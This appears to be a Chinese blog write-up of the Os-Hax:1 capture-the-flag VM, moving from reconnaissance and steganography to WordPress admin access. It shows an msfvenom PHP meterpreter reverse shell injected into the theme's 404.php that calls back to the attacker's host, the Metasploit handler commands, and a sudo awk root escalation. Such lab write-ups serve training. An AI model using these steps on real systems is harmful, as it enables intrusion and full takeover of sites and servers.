zoukankan      html  css  js  c++  java
  • Os-Hax: 1 靶机记录

    靶机地址:172.16.1.197

    Kali地址:172.16.1.108

    1 信息搜集

    靶机首页

     

    相关信息查看

     

    端口扫描:

    开放2280

     

    目录扫描:

     

    访问http://172.16.1.197/css/  ,点击内容没有发现。

     

    访问http://172.16.1.197/html/,同样没有发现;

    访问http://172.16.1.197/img,在目录下发现名为flaghost.png的图片

     

    访问http://172.16.1.197/wordpress

    发现许多跳转到localhost无法访问,联想图片内容,修改host

    vi /etc/hosts

     

    修改后,发现wordpress访问也正常了

     

    Wappalyzer查看相关信息

     

    CMSwordpress 5.2.5

    再次目录扫描,发现目录wp-includes等多个目录

     

     

    查看目录没有发现敏感信息。

    尝试使用wpscan跑一下,没有结果

     

     

      

    已知CMS版本,尝试搜索漏洞。网上查看有漏洞,但没有可以直接利用的exp

    卡住了。。。。

    因为图片名字敏感(我是不会说百度了),继续针对图片猜想。尝试了图片隐写。发现passw@45 字符串。

     

    猜想为密码,使用wordpress默认用户名登录,无果。

    猜想为页面目录,访问http://172.16.1.197/passw@45。成功

     

    点击查看flag2.txt,显示一串代码

    i+++++ +++++ [->++ +++++ +++<] >++++ +++++ +++++ +++++ .<+++ +[->- ---<]

    >--.- --.<+ +++++ [->-- ----< ]>--- -.<++ +[->+ ++<]> +++++ .<+++ ++[->

    +++++ <]>.+ +.+++ +++++ .---- --.<+ ++[-> +++<] >++++ .<+++ ++++[ ->---

    ----< ]>-.< +++[- >---< ]>--- .+.-- --.++ +.<

    之前遇到过,直接brainfuck在线解码:https://www.splitbrain.org/services/ook

     

    解码为:web:Hacker@4514

    尝试登陆。登陆成功。。。

     

    2 漏洞发现与利用

    综合收搜索到的信息:

    OSubuntu

    开放端口:22/80

    Web服务器:Apache 2.4.18

    脚本语言:PHP

    数据库:MySQL

    CMSwordpress 5.2.5

    Web登陆账号密码:web:Hacker@4514

    由于cms版本未找到可用exp,尝试登陆后进一步发现利用。

    WordPress登录后台之后,看能不能修改主题中php文件

    主题中php文件通过菜单栏中Appearance->Theme Editor404.php来改:

     

      

    Kalimsfvenom生成webshell,填入404.php中,然后更新文件(Update File

    msfvenom生成shellkali地址172.16.1.107):

    msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.107 LPORT=1234 R > shell.php

     

    shell.php内容复制到404.php,并更新(去掉最开头的/*,不然浏览器访问反弹shellphp网页会看到/*,并且无法反弹shell

     

      

    msfconsole设置接收反弹的shell,依次执行:

    msfconsole

    use exploit/multi/handler

    set payload php/meterpreter/reverse_tcp

    set lhost 172.16.1.107

    set lport 1234

    运行后,访问浏览器访问404.php

    http://172.16.1.197/wordpress/wp-content/themes/twentynineteen/404.php

    (访问WordPress某个主题下的php页面时,其URL主要部分的格式为/wp-content/themes/主题名称全小写/页面名称。例如,我们刚才修改的主题名称为Twenty Nineteen,访问时只需要修改成twentynineteen即可)

    可以看到,成功获取shell

     

    获取shell之后要做的第一件事是使用Python获取一个tty

    python -c 'import pty; pty.spawn("/bin/bash")'

     

      

    3权限提升

    习惯性查看www目录,发现文件基本跟web界面看到的一致,没有敏感文件

     

    查看home目录

     

    web下有flag3.txt,打开查看为一串MD5-HASH

     

    40740735d446c27cd551f890030f7c75  无法解密

    查看etc下的passwd,发现有web用户

     

    web账户,尝试切换用户,使用已知的密码登录,成功

     

    因开放有22端口,索性ssh连接

    ssh web@172.16.1.197 -p 22

     

    查看信息

      

    sudo -l发现web用户可以执行/usr/bin/awk命令,直接提权到root

    sudo /usr/bin/awk 'BEGIN {system("/bin/bash")}'

     

    切换root目录,显示完成

     

  • 相关阅读:
    「CSP-S 2019」树的重心「重心」
    「SDOI2017」天才黑客「优化建图最短路」
    「NOI Online Round2」 题解
    Qt 自定义序列化
    Android 定制化apk生成
    gradle上传jar包到maven公共仓库
    JAVA 插入注解处理器
    使用docker安装gitlab
    数据库递归树形查询优化
    JDBCTemplate使用
  • 原文地址:https://www.cnblogs.com/appear001/p/12071243.html
Copyright © 2011-2022 走看看